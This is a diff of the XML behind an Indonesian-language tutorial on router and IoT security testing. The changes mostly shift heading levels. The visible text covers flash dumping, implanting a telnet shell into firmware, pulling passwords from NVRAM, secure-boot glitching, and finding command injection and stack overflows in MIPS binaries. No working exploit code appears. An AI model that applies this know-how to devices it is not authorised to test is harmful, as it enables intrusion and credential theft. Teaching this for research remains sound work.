-        <w:t>membaca (dump)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
         <w:t xml:space="preserve"> seluruh isi chip — termasuk partisi &amp; konfigurasi.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>20.2 Langkah praktis</w:t>
@@ -8154,10 +8242,54 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>20.3 Edit firmware (contoh belajar)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Kadang kita bisa menyisipkan shell/telnet ke rootfs, lalu reflash. Tapi hati-hati: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>salah tulis = brick</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>. Selalu backup (`-r`) dulu dan verifikasi checksum.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Cari partisi JFFS2/NVRAM berisi password — kadang langsung terbaca.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Beberapa chip punya proteksi; butuh tunggu/lepaskan dari board.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>20.3 Edit firmware (contoh belajar)</w:t>
+        <w:t>21. Secure Boot &amp; Glitch (konsep)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8165,19 +8297,31 @@
         <w:rPr>
           <w:b w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">Kadang kita bisa menyisipkan shell/telnet ke rootfs, lalu reflash. Tapi hati-hati: </w:t>
+        <w:t xml:space="preserve">Perangkat modern mulai memakai </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>salah tulis = brick</w:t>
+        <w:t>secure boot</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
         </w:rPr>
-        <w:t>. Selalu backup (`-r`) dulu dan verifikasi checksum.</w:t>
+        <w:t xml:space="preserve"> (firmware ditandatangani) dan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>read-out protection</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>. Menembusnya butuh: fault injection (glitch tegangan/clock), chip-off, atau eksploitasi bootloader. Untuk pemula, cukup pahami konsepnya; fokus dulu ke perangkat tanpa proteksi (seperti banyak router konsumen).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8185,7 +8329,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Cari partisi JFFS2/NVRAM berisi password — kadang langsung terbaca.</w:t>
+        <w:t>Glitch: mengganggu eksekusi tepat saat verifikasi agar 'lolos'.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8193,7 +8337,20 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Beberapa chip punya proteksi; butuh tunggu/lepaskan dari board.</w:t>
+        <w:t>Chip-off: melepas chip dan baca dengan programmer.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Menu recovery/U-Boot sebagai pintu alternatif.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
       </w:r>
     </w:p>
     <w:p>
@@ -8201,81 +8358,12 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t>21. Secure Boot &amp; Glitch (konsep)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Perangkat modern mulai memakai </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>secure boot</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (firmware ditandatangani) dan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>read-out protection</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t>. Menembusnya butuh: fault injection (glitch tegangan/clock), chip-off, atau eksploitasi bootloader. Untuk pemula, cukup pahami konsepnya; fokus dulu ke perangkat tanpa proteksi (seperti banyak router konsumen).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Glitch: mengganggu eksekusi tepat saat verifikasi agar 'lolos'.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Chip-off: melepas chip dan baca dengan programmer.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Menu recovery/U-Boot sebagai pintu alternatif.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>BAGIAN VI — POLA &amp; PENUTUP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:t>POLA &amp; PENUTUP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>22. Cheat Sheet Pola Celah</w:t>
@@ -8751,7 +8839,7 @@
     <w:p/>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>23. Roadmap &amp; Latihan Lanjutan</w:t>
@@ -8759,147 +8847,147 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>23.1 Latihan di perangkat ini (aman)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Ulangi Bab 4–7 dan catat setiap temuan pada template laporan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Uji lebih banyak kredensial default (user/support/guest) — dokumentasikan hasilnya.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Unduh firmware resmi AC6 v2, ekstrak dengan binwalk, cari /bin/httpd.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Jalankan `strings` pada httpd, cari 'goform' dan 'password'.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>23.2 Saat alat tiba</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Raspberry Pi: jadikan 'jump box' (nmap, FirmAE, ghidra-server).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>USB-TTL: coba UART pada perangkat latihan bekas (router lama) dulu.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>CH341A: latih dump pada chip flash bekas sebelum menyentuh perangkat penting.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>23.3 Sumber belajar</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>OWASP IoT Top 10 &amp; OWASP Testing Guide.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>NVD/CVE untuk memetakan versi → kerentanan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Repo riset (mis. FirmRec/IoT-Vulns) untuk melihat pola PoC.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>FirmAE/FAT + Ghidra untuk analisis &amp; emulasi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>23.4 Etika &amp; karir</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Jadikan skill ini untuk </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>bug bounty, riset, audit, dan perbaikan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>. Selalu ada izin tertulis. Skill hardware/firmware sangat dicari di bidang keamanan embedded &amp; IoT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>23.1 Latihan di perangkat ini (aman)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Ulangi Bab 4–7 dan catat setiap temuan pada template laporan.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Uji lebih banyak kredensial default (user/support/guest) — dokumentasikan hasilnya.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Unduh firmware resmi AC6 v2, ekstrak dengan binwalk, cari /bin/httpd.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Jalankan `strings` pada httpd, cari 'goform' dan 'password'.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>23.2 Saat alat tiba</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Raspberry Pi: jadikan 'jump box' (nmap, FirmAE, ghidra-server).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>USB-TTL: coba UART pada perangkat latihan bekas (router lama) dulu.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>CH341A: latih dump pada chip flash bekas sebelum menyentuh perangkat penting.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>23.3 Sumber belajar</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>OWASP IoT Top 10 &amp; OWASP Testing Guide.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>NVD/CVE untuk memetakan versi → kerentanan.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Repo riset (mis. FirmRec/IoT-Vulns) untuk melihat pola PoC.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>FirmAE/FAT + Ghidra untuk analisis &amp; emulasi.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>23.4 Etika &amp; karir</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Jadikan skill ini untuk </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>bug bounty, riset, audit, dan perbaikan</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t>. Selalu ada izin tertulis. Skill hardware/firmware sangat dicari di bidang keamanan embedded &amp; IoT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>24. Glosarium</w:t>
@@ -9319,7 +9407,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>Lampiran A — Bukti Live Perangkat Anda</w:t>
@@ -9816,7 +9904,6 @@
     <w:p/>
     <w:p/>
     <w:p/>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -9826,7 +9913,7 @@
         <w:rPr>
           <w:b/>
           <w:color w:val="888888"/>
-          <w:sz w:val="32"/>
+          <w:sz w:val="44"/>
         </w:rPr>
         <w:t>BAGIAN III</w:t>
       </w:r>
@@ -9840,9 +9927,14 @@
         <w:rPr>
           <w:b/>
           <w:color w:val="0B3D91"/>
-          <w:sz w:val="48"/>
-        </w:rPr>
-        <w:t>Reverse Engineering &amp; Binary Exploitation (MIPS &amp; ARM)</w:t>
+          <w:sz w:val="52"/>
+        </w:rPr>
+        <w:t>Reverse Engineering &amp; Binary Exploitation (MIPS)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
       </w:r>
     </w:p>
     <w:p>
@@ -10087,14 +10179,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Daftar Isi</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -10325,17 +10409,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>BAGIAN A — FONDASI REVERSE ENGINEERING</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
+        <w:t>FONDASI REVERSE ENGINEERING</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
         <w:t>1. Apa itu Reverse Engineering &amp; Mengapa Penting</w:t>
       </w:r>
     </w:p>
@@ -10437,7 +10521,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>2. Toolchain Reverse Engineering</w:t>
@@ -10986,7 +11070,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>3. ELF &amp; Arsitektur MIPS</w:t>
@@ -10994,7 +11078,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>3.1 MIPS 24Kc — register penting</w:t>
@@ -11094,7 +11178,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>3.2 Bukti nyata dari kernel perangkat Anda</w:t>
@@ -11181,7 +11265,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>3.3 Entry point kernel (contoh nyata)</w:t>
@@ -11213,7 +11297,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>4. Perbandingan MIPS / ARM / x86</w:t>
@@ -11579,15 +11663,15 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>BAGIAN B — RE UNTUK MENEMUKAN CELAH</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>RE UNTUK MENEMUKAN CELAH</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>5. Alur: Firmware -&gt; httpd -&gt; Webroot -&gt; XREF</w:t>
@@ -11691,7 +11775,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>6. Membaca Binary: file, readelf, nm, strings</w:t>
@@ -11787,7 +11871,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>7. Ghidra 101</w:t>
@@ -11843,23 +11927,23 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>7.1 Contoh membaca handler</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>Handler khas Tenda berbentuk `formXXX` / `setXXX`. Di decompiler Anda akan melihat pola: ambil parameter -&gt; salin ke buffer -&gt; kerjakan. Dari sinilah celah ditemukan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>7.1 Contoh membaca handler</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t>Handler khas Tenda berbentuk `formXXX` / `setXXX`. Di decompiler Anda akan melihat pola: ambil parameter -&gt; salin ke buffer -&gt; kerjakan. Dari sinilah celah ditemukan.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>8. Pola Celah di Decompiler</w:t>
@@ -12212,7 +12296,7 @@
     <w:p/>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>8.1 Menerjemahkan C ke assembly MIPS</w:t>
@@ -12262,7 +12346,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>9. Menemukan Command Injection lewat RE</w:t>
@@ -12330,7 +12414,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>10. Menemukan Buffer Overflow lewat RE</w:t>
@@ -12737,7 +12821,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>11. Dynamic Analysis</w:t>
@@ -12745,7 +12829,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>11.1 Menjalankan binary MIPS di PC</w:t>
@@ -12769,7 +12853,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>11.2 Debug dengan gdb-multiarch</w:t>
@@ -12803,7 +12887,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>11.3 Menelusuri eksekusi</w:t>
@@ -12849,15 +12933,15 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>BAGIAN C — BINARY EXPLOITATION</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>BINARY EXPLOITATION</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>12. Layout Memori Proses</w:t>
@@ -12949,47 +13033,47 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>12.1 Tanpa ASLR = alamat stabil</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Banyak perangkat embedded </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>mematikan ASLR</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (tidak ada `/proc/sys/kernel/randomize_va_space` atau di-set 0). Artinya alamat stack/library </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>sama setiap kali</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> — mempermudah eksploitasi dibanding desktop modern. Ini alasan router sering jadi target RCE.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>12.1 Tanpa ASLR = alamat stabil</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Banyak perangkat embedded </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>mematikan ASLR</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (tidak ada `/proc/sys/kernel/randomize_va_space` atau di-set 0). Artinya alamat stack/library </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>sama setiap kali</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> — mempermudah eksploitasi dibanding desktop modern. Ini alasan router sering jadi target RCE.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>13. Mekanika Stack Overflow</w:t>
@@ -13049,75 +13133,75 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>13.1 Konsep universal</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Program membuat buffer lokal di stack (mis. 64 byte).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Fungsi menyalin input tanpa cek batas -&gt; byte melebihi 64 menimpa data setelah buffer.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Di x86, yang ditimpa adalah saved EIP (return address).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Saat fungsi `return`, CPU melompat ke alamat yang kita kendalikan -&gt; kontrol eksekusi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>13.2 Kenapa masih relevan?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Meski ada mitigasi (canary/NX/ASLR), </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>firmware router sering mengompilasi tanpa proteksi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> untuk menghemat ukuran/kompatibilitas. Jadi stack overflow tetap mematikan di IoT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>13.1 Konsep universal</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Program membuat buffer lokal di stack (mis. 64 byte).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Fungsi menyalin input tanpa cek batas -&gt; byte melebihi 64 menimpa data setelah buffer.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Di x86, yang ditimpa adalah saved EIP (return address).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Saat fungsi `return`, CPU melompat ke alamat yang kita kendalikan -&gt; kontrol eksekusi.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>13.2 Kenapa masih relevan?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Meski ada mitigasi (canary/NX/ASLR), </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>firmware router sering mengompilasi tanpa proteksi</w:t>
-      </w:r>
-      <w:r>
